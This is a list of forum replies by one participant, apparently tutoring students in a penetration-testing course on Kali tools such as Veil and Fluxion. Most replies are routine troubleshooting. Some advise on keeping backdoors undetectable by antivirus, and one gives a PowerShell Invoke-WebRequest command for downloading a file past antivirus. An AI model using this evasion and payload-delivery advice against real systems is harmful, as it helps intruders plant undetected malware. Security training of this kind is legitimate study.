Forum Replies Created
- AuthorPosts
Diego Pérez
ParticipantHi!
Can you try this solution:apt update
apt install -y aptitude
aptitude install -y veilYou have to run this commands in a fresh custom kali.
Let me know how it goes!
DiegoDiego Pérez
ParticipantHi!
This is a huge framework and will take a time to load, it can take up to 40 mins depending on the amount of RAM assigned to kali, the recommended is 6GB at least. So just give it a time.Greetings!
DiegoDiego Pérez
ParticipantHi!
Can you share some screenshots of the settings used in fluxion? Can you share the results of ifconfig BEFORE running the attack?Thanks!
DiegoDiego Pérez
ParticipantHi!
That’s the proper way to use powershell to download and execute a file, you can try to use another option, using Invoke-WebRequest, but it also might be flaged by the AV.
The command would be:
powershell iwr -uri http://<your address here> -outfile <name of the file>Try using it.
Let me know how it goes!
DiegoDiego Pérez
ParticipantHi!
Thanks, give me a couple of days and I’ll get back to you.Greetings!
DiegoDiego Pérez
ParticipantHi!
Yeah, in macOS you’ll need to use the command open, if you just give it the name of the file nothing will happen, as you can see in the error message it saids command not found, so it thinks that image.jpg is a command and not a file.
So inside the subprocees call just add the command open befor the name of the file. You can test it directly in macOS terminal to check that it works.Hope it helps!
DiegoDiego Pérez
ParticipantHi!
If you want to use fluxion 2 then follow these steps:
https://github.com/hacker3983/how-to-install-pyrit-on-kali-linux-2020.1aJust don run apt-get upgrade.
Can you tell me the exact model of your adapter?(brand and model)
Greetings!
DiegoDiego Pérez
ParticipantHi!
Hope it helped!
DiegoDiego Pérez
ParticipantHi!
Can you post your code here? Bur use the CODE button in the interface so I can read it with the proper indentation and try it out.Let me know.
DiegoDiego Pérez
ParticipantHi!
Cool you got it!
DiegoDiego Pérez
ParticipantHi!
Try using this version instead:
https://github.com/FluxionNetwork/fluxionLet me know how it goes!
DiegoDiego Pérez
ParticipantHi!
It looks like you have to install a different version, take a look at this articles:https://installlion.com/kali/kali/main/p/pidgin-otr/install/index.html
https://otr.cypherpunks.ca/Hope it helps!
DiegoDiego Pérez
ParticipantHi!
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable ……..So you need to keep trying different things, try to split it more.
Hope it helps!
DiegoDiego Pérez
ParticipantHi!
Yeah! That’s it, keep trying is the way.Greetings!
DiegoDiego Pérez
ParticipantHi!
Ok, but you didn’t pay attention to what I said. Does it work as a script? This is the first step and you haven’t clarified it.Let me know.
Diego- AuthorPosts